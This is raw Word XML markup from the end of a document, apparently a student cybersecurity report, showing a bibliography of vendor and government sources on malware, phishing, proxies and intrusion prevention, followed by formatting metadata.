                      <w:t>Malwarebytes, “wannacry,” Malwarebytes, N/A. [Online]. Available: https://www.malwarebytes.com/wannacry. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="00769EC0" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="44017A4A" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[11] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="07BD33BD" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>K. W. Ruchna Nigam, “TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API to Target Iranian Users,” Paloaltonetworks, 20 March 2018. [Online]. Available: https://unit42.paloaltonetworks.com/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="75A80065" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="61B4CAFE" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[12] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6FDC68A9" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Cisco, “What Is Phishing?,” Cisco, N/A. [Online]. Available: https://www.cisco.com/c/en/us/products/security/email-security/what-is-phishing.html#:~:text=Phishing%20is%20the%20practice%20of,malware%20on%20the%20victim's%20device.. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="35ED73DB" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="49241D33" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[13] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="098106C5" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>National Cyber Security Centre, “Business email compromise: defending your organisation,” N/A. [Online]. Available: https://www.ncsc.gov.uk/guidance/business-email-compromise-defending-your-organisation#:~:text=Whaling%20is%20a%20highly%20targeted,a%20wire%20transfer%20of%20funds.. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="025B697E" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="71826C8D" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[14] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="338B4ED1" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>mimecast, “Whaling Phishing Attack,” N/A. [Online]. Available: https://www.mimecast.com/content/whaling-phishing-attack/. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="574E79B9" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="07EAB7C8" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[15] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="52991F31" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Malwarebytes, “pharming,” N/A. [Online]. Available: https://www.malwarebytes.com/pharming. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="0F82FEEF" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="78A0A471" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[16] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="45D17504" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Lenovo, “mesh topology,” N/A. [Online]. Available: https://www.lenovo.com/gb/en/glossary/mesh-topology/?orgRef=https%253A%252F%252Fwww.google.com%252F. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="24BC15DC" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2F7AE08E" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[17] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1805773D" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Henmi, “Firewall Policies and VPN Configurations,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Chapter 5 - Defining a VPN, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 211-265, 2006. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="0A936982" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5E9F6353" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[18] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="23B24F28" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Malwarebytes, “Antivirus,” N/A. [Online]. Available: https://www.malwarebytes.com/antivirus. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="508090CE" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="544347A3" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[19] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="342026E3" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>T. Hunt, “FAQs,” N/A. [Online]. Available: https://haveibeenpwned.com/FAQs. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="61308EDB" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6F400D78" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[20] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="07519E3F" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>M. Buckbee, “What is a Proxy Server and How Does it Work?,” Varonis, 24 June 2022. [Online]. Available: https://www.varonis.com/blog/what-is-a-proxy-server. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="54C26395" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1EE55BB3" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[21] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5FFBAA55" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Fortinet, “What is a Proxy Server? How does it work?,” N/A. [Online]. Available: https://www.fortinet.com/uk/resources/cyberglossary/proxy-server. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="712A2498" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="407329C3" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[22] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1D16077E" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Vmware, “What is an intrusion prevention system?,” N/A. [Online]. Available: https://www.vmware.com/topics/glossary/content/intrusion-prevention-system.html#:~:text=An%20intrusion%20prevention%20system%20(IPS,it%2C%20when%20it%20does%20occur.. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
            </w:tbl>
            <w:p w14:paraId="78CAC16B" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
              <w:pPr>
                <w:divId w:val="883178404"/>
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
            </w:p>
            <w:p w14:paraId="37BF6613" w14:textId="7FC585B2" w:rsidR="00832908" w:rsidRPr="006010C3" w:rsidRDefault="00832908">
              <w:r w:rsidRPr="006010C3">
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="23230603" w14:textId="77777777" w:rsidR="00832908" w:rsidRPr="006010C3" w:rsidRDefault="00832908" w:rsidP="00832908"/>
    <w:sectPr w:rsidR="00832908" w:rsidRPr="006010C3" w:rsidSect="00BA459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131382"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84923B3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CE6EB9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="051A1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2B0154"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63C02F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F110AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DBCCC5DC"/>
    <w:lvl w:ilvl="0" w:tplc="08C01E7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9182798">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1258169804">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1771002415">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1836918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D96"/>
    <w:rsid w:val="00020B1A"/>
    <w:rsid w:val="00024A6D"/>
    <w:rsid w:val="000427B2"/>
    <w:rsid w:val="00052AAE"/>
    <w:rsid w:val="00070B80"/>
    <w:rsid w:val="00076C32"/>
    <w:rsid w:val="00077E52"/>
    <w:rsid w:val="00083D35"/>
    <w:rsid w:val="00083DEC"/>
    <w:rsid w:val="000B2C45"/>
    <w:rsid w:val="000B3BA2"/>
    <w:rsid w:val="000B61C4"/>
    <w:rsid w:val="000C63F1"/>
    <w:rsid w:val="000C6EF5"/>
    <w:rsid w:val="000C77BE"/>
    <w:rsid w:val="000D6B6C"/>
    <w:rsid w:val="00107AB7"/>
    <w:rsid w:val="00110D7B"/>
    <w:rsid w:val="00146A2F"/>
    <w:rsid w:val="001534BD"/>
    <w:rsid w:val="00155ECF"/>
    <w:rsid w:val="00157694"/>
    <w:rsid w:val="0017509E"/>
    <w:rsid w:val="0017640E"/>
    <w:rsid w:val="00185AE5"/>
    <w:rsid w:val="001904F1"/>
    <w:rsid w:val="001A2CD4"/>
    <w:rsid w:val="001A65EF"/>
    <w:rsid w:val="001A6650"/>
    <w:rsid w:val="001A696D"/>
    <w:rsid w:val="001B3FE1"/>
    <w:rsid w:val="001B67E7"/>
    <w:rsid w:val="001D2F09"/>
    <w:rsid w:val="001D78B5"/>
    <w:rsid w:val="001E3977"/>
    <w:rsid w:val="001F29A7"/>
    <w:rsid w:val="0020249A"/>
    <w:rsid w:val="0023425E"/>
    <w:rsid w:val="00245849"/>
    <w:rsid w:val="0024652A"/>
    <w:rsid w:val="002802E0"/>
    <w:rsid w:val="002814F1"/>
    <w:rsid w:val="002A76A9"/>
    <w:rsid w:val="002B0D85"/>
    <w:rsid w:val="002B0E80"/>
    <w:rsid w:val="002B2007"/>
    <w:rsid w:val="002B591C"/>
    <w:rsid w:val="002C23D7"/>
    <w:rsid w:val="002C2C4A"/>
    <w:rsid w:val="002D389E"/>
    <w:rsid w:val="00302AA8"/>
    <w:rsid w:val="00304A0B"/>
    <w:rsid w:val="00310E26"/>
    <w:rsid w:val="00317552"/>
    <w:rsid w:val="00317CB4"/>
    <w:rsid w:val="00325DBE"/>
    <w:rsid w:val="00327424"/>
    <w:rsid w:val="00327AC9"/>
    <w:rsid w:val="003413C3"/>
    <w:rsid w:val="00344FB3"/>
    <w:rsid w:val="00351CED"/>
    <w:rsid w:val="003752C8"/>
    <w:rsid w:val="003833DA"/>
    <w:rsid w:val="00387ABD"/>
    <w:rsid w:val="0039230A"/>
    <w:rsid w:val="003A3864"/>
    <w:rsid w:val="003B423F"/>
    <w:rsid w:val="003B4426"/>
    <w:rsid w:val="003B6668"/>
    <w:rsid w:val="003B72F4"/>
    <w:rsid w:val="003D1D96"/>
    <w:rsid w:val="003E41DD"/>
    <w:rsid w:val="00401779"/>
    <w:rsid w:val="0042145A"/>
    <w:rsid w:val="00427834"/>
    <w:rsid w:val="004323BB"/>
    <w:rsid w:val="00433519"/>
    <w:rsid w:val="0043430A"/>
    <w:rsid w:val="004444C7"/>
    <w:rsid w:val="0045488E"/>
    <w:rsid w:val="00464F90"/>
    <w:rsid w:val="0049289E"/>
    <w:rsid w:val="004A558A"/>
    <w:rsid w:val="004B0116"/>
    <w:rsid w:val="004B3324"/>
    <w:rsid w:val="004B5621"/>
    <w:rsid w:val="004B6D51"/>
    <w:rsid w:val="004C26B4"/>
    <w:rsid w:val="004D5D05"/>
    <w:rsid w:val="004E4A8F"/>
    <w:rsid w:val="004F3BA5"/>
    <w:rsid w:val="004F537B"/>
    <w:rsid w:val="00503C2C"/>
    <w:rsid w:val="005116EE"/>
    <w:rsid w:val="00514045"/>
    <w:rsid w:val="005208C6"/>
    <w:rsid w:val="00521A8F"/>
    <w:rsid w:val="00531D04"/>
    <w:rsid w:val="005412EF"/>
    <w:rsid w:val="00552259"/>
    <w:rsid w:val="005620A2"/>
    <w:rsid w:val="00570B0A"/>
    <w:rsid w:val="00580C6E"/>
    <w:rsid w:val="00583532"/>
    <w:rsid w:val="005839DF"/>
    <w:rsid w:val="00583C87"/>
    <w:rsid w:val="00584384"/>
    <w:rsid w:val="005A38A8"/>
    <w:rsid w:val="005A4D90"/>
    <w:rsid w:val="005A60D9"/>
    <w:rsid w:val="005C092F"/>
    <w:rsid w:val="005C7A02"/>
    <w:rsid w:val="005D6F12"/>
    <w:rsid w:val="005E6113"/>
    <w:rsid w:val="005F18AC"/>
    <w:rsid w:val="005F7C60"/>
    <w:rsid w:val="006010C3"/>
    <w:rsid w:val="00617568"/>
    <w:rsid w:val="0062208D"/>
    <w:rsid w:val="00653BCB"/>
    <w:rsid w:val="0067442B"/>
    <w:rsid w:val="00677A05"/>
    <w:rsid w:val="00696510"/>
    <w:rsid w:val="00697010"/>
    <w:rsid w:val="006A04D4"/>
    <w:rsid w:val="006A150D"/>
    <w:rsid w:val="006A3864"/>
    <w:rsid w:val="006B6745"/>
    <w:rsid w:val="006C24D1"/>
    <w:rsid w:val="006D07BF"/>
    <w:rsid w:val="006D5178"/>
    <w:rsid w:val="006D6C0E"/>
    <w:rsid w:val="006D6D6C"/>
    <w:rsid w:val="006D7751"/>
    <w:rsid w:val="006E7C20"/>
    <w:rsid w:val="00707A72"/>
    <w:rsid w:val="0070EE95"/>
    <w:rsid w:val="00711CEF"/>
    <w:rsid w:val="007160D0"/>
    <w:rsid w:val="007160DE"/>
    <w:rsid w:val="00721014"/>
    <w:rsid w:val="00743D3A"/>
    <w:rsid w:val="007462DE"/>
    <w:rsid w:val="0075023A"/>
    <w:rsid w:val="007509D8"/>
    <w:rsid w:val="00763199"/>
    <w:rsid w:val="00765219"/>
    <w:rsid w:val="00767FEA"/>
    <w:rsid w:val="00775865"/>
    <w:rsid w:val="00777044"/>
    <w:rsid w:val="00781A88"/>
    <w:rsid w:val="0078252F"/>
    <w:rsid w:val="00783099"/>
    <w:rsid w:val="007908BD"/>
    <w:rsid w:val="007954F8"/>
    <w:rsid w:val="007A1A14"/>
    <w:rsid w:val="007C09BC"/>
    <w:rsid w:val="007C5044"/>
    <w:rsid w:val="007C5F79"/>
    <w:rsid w:val="007D2DFD"/>
    <w:rsid w:val="007E2525"/>
    <w:rsid w:val="007E26FB"/>
    <w:rsid w:val="007E6F2E"/>
    <w:rsid w:val="007F0121"/>
    <w:rsid w:val="00832908"/>
    <w:rsid w:val="0083693A"/>
    <w:rsid w:val="00855FA8"/>
    <w:rsid w:val="00865224"/>
    <w:rsid w:val="0087603B"/>
    <w:rsid w:val="00884B7B"/>
    <w:rsid w:val="008A155C"/>
    <w:rsid w:val="008B62E8"/>
    <w:rsid w:val="008B6640"/>
    <w:rsid w:val="008D59C2"/>
    <w:rsid w:val="008D7BF2"/>
    <w:rsid w:val="008F3638"/>
    <w:rsid w:val="008F7ACA"/>
    <w:rsid w:val="009022F3"/>
    <w:rsid w:val="009119E3"/>
    <w:rsid w:val="00921435"/>
    <w:rsid w:val="00930C42"/>
    <w:rsid w:val="00933C19"/>
    <w:rsid w:val="0095027B"/>
    <w:rsid w:val="009513C2"/>
    <w:rsid w:val="00960734"/>
    <w:rsid w:val="00962163"/>
    <w:rsid w:val="00964D8D"/>
    <w:rsid w:val="0097421F"/>
    <w:rsid w:val="0097434A"/>
    <w:rsid w:val="0097623B"/>
    <w:rsid w:val="0098074F"/>
    <w:rsid w:val="00991DAF"/>
    <w:rsid w:val="0099376E"/>
    <w:rsid w:val="009A3443"/>
    <w:rsid w:val="009C0189"/>
    <w:rsid w:val="009E658C"/>
    <w:rsid w:val="00A05103"/>
    <w:rsid w:val="00A168FD"/>
    <w:rsid w:val="00A169A5"/>
    <w:rsid w:val="00A30923"/>
    <w:rsid w:val="00A5436E"/>
    <w:rsid w:val="00A622BD"/>
    <w:rsid w:val="00A81E55"/>
    <w:rsid w:val="00A927FA"/>
    <w:rsid w:val="00AA5BB7"/>
    <w:rsid w:val="00AB62AA"/>
    <w:rsid w:val="00AC04A1"/>
    <w:rsid w:val="00AE261B"/>
    <w:rsid w:val="00AE4630"/>
    <w:rsid w:val="00AE5447"/>
    <w:rsid w:val="00AE7658"/>
    <w:rsid w:val="00AF3473"/>
    <w:rsid w:val="00AF7389"/>
    <w:rsid w:val="00B019EC"/>
    <w:rsid w:val="00B1328F"/>
    <w:rsid w:val="00B312DE"/>
    <w:rsid w:val="00B34292"/>
    <w:rsid w:val="00B34CC4"/>
    <w:rsid w:val="00B403BF"/>
    <w:rsid w:val="00B40462"/>
    <w:rsid w:val="00B508DA"/>
    <w:rsid w:val="00B605E0"/>
    <w:rsid w:val="00B60709"/>
    <w:rsid w:val="00B768DA"/>
    <w:rsid w:val="00B93B95"/>
    <w:rsid w:val="00BA4599"/>
    <w:rsid w:val="00BB027D"/>
    <w:rsid w:val="00BB02EF"/>
    <w:rsid w:val="00BB1F19"/>
